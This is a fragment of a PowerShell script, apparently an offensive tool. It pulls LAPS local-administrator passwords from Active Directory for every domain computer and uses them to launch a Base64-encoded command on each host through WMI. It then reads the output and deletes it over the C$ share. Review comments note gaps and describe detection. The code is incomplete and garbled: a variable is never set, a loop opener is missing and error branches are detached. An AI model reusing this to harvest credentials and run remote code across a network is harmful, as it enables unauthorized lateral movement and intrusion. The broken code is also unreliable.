# Save with Encoding "UTF-8 with BOM"
# (presumably so Windows PowerShell reads any non-ASCII characters in this file correctly — confirm)
#
# Setup section: configures console/error behaviour and builds the Base64-encoded
# command string that the rest of this file passes to `powershell -enc` on remote hosts.
# NOTE(review): the ForEach-Object loop that consumes $encodedCommand further down is
# incomplete in this excerpt (its `$comp` assignment, `do {` opener and the
# else/catch branches are not visible), so it is not documented here.

# Make this session emit UTF-8 on stdout so output fetched from remote hosts renders correctly.
[System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8
# Turn non-terminating cmdlet errors into terminating ones for the whole script.
$ErrorActionPreference = "Stop"
# Command executed on the remote host: first force UTF-8 console output there as well ...
$command = '[System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
# ... then run whoami and capture both stdout and stderr into a fixed temp file
# (the file is read back and removed over the C$ share later in the file).
$command += 'whoami > C:\Windows\Temp\whoami.txt 2>&1'
# powershell -enc expects Base64 of the UTF-16LE bytes of the script text;
# [System.Text.Encoding]::Unicode is UTF-16LE.
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
# Defender note: where Script Block Logging is enabled, -EncodedCommand payloads are
# recorded in decoded form (PowerShell event 4104), so encoding does not hide $command.
$encodedCommand = [Convert]::ToBase64String($bytes)
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | ? {$_.name -ne $(hostname)} | select name,ms-Mcs-AdmPwd | ForEach-Object {
$pass = $_."ms-Mcs-AdmPwd"
if (Test-Connection -BufferSize 32 -Count 1 -ComputerName $comp -Quiet) {
$cred = New-Object System.Management.Automation.PSCredential("$comp\administrator", $(ConvertTo-SecureString $pass -AsPlainText -Force))
$proc = Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc $encodedCommand") -ComputerName $comp -Credential $cred
Write-Host -ForegroundColor Green "[*] Waiting for script to finish on $comp"
} until ((Get-WmiObject -Class Win32_Process -Filter "ProcessId=$proc.ProcessId" -ComputerName $comp -Credential $cred | where {$_.ProcessId -eq $proc.ProcessId}).ProcessId -eq $null)
net use "\\$comp" /user:administrator $pass 2>&1 | Out-Null
Get-Content "\\$comp\C$\Windows\Temp\whoami.txt"
Remove-Item "\\$comp\C$\Windows\Temp\whoami.txt" -Force
net use "\\$comp" /delete 2>&1 | Out-Null
Write-Host -ForegroundColor Red "[-] Connection failure: $comp"
Write-Host -ForegroundColor Yellow "[!] Connection timed out: $comp"